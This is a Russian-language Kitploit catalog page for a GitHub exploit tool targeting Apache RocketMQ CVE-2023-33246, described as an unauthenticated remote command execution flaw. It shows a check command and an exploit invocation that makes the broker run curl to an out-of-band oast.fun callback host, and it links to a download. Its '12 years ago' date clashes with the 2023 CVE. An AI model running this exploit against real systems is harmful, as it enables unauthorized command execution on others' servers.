Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-33246_RocketMQ_RCE_EXP — Эксплойт для CVE-2023-33246, нацеленный на брокеры Apache RocketMQ. Выполняет произвольные команды через неаутентифицированное обновление конфигурации или поддельные сообщения протокола на уязвимых версиях 5.1.0 и ниже. | Kitploit
Инструменты/GitHubGitHub/mkjos/cve-2023-33246_rocketmq_rce_exp
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHubmkjos/cve-2023-33246_rocketmq_rce_exp

CVE-2023-33246_RocketMQ_RCE_EXP

Эксплойт для CVE-2023-33246, нацеленный на брокеры Apache RocketMQ. Выполняет произвольные команды через неаутентифицированное обновление конфигурации или поддельные сообщения протокола на уязвимых версиях 5.1.0 и ниже.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
12 лет назадЕщё не проверено

CVE-2023-33246_RocketMQ_RCE_EXP

CVE-2023-33246 Эксплойт удаленного выполнения кода RocketMQ

Обзор

RocketMQ версии 5.1.0 и ниже уязвимы к произвольному внедрению кода (Arbitrary Code Injection). Компонент Broker RocketMQ доступен из экстранета и не имеет проверки прав. Злоумышленник может использовать эту уязвимость через функцию обновления конфигурации для выполнения команд от имени системного пользователя, под которым запущен RocketMQ. Кроме того, злоумышленник может добиться того же эффекта путем подделки содержимого протокола RocketMQ.

Обнаружение версии RocketMQ для выявления уязвимостей

Примеры использования

проверка

root@kitploit:~
./RocketMQRceCheck -host 127.0.0.1 -port 9876

эксплойт

root@kitploit:~
RocketMQ_RCE_EXPLOIT 127.0.0.1 10911 curl chw9ft72vtc00002z5k0ge6rz7eyyyyyb.oast.fun/test
Скачать инструмент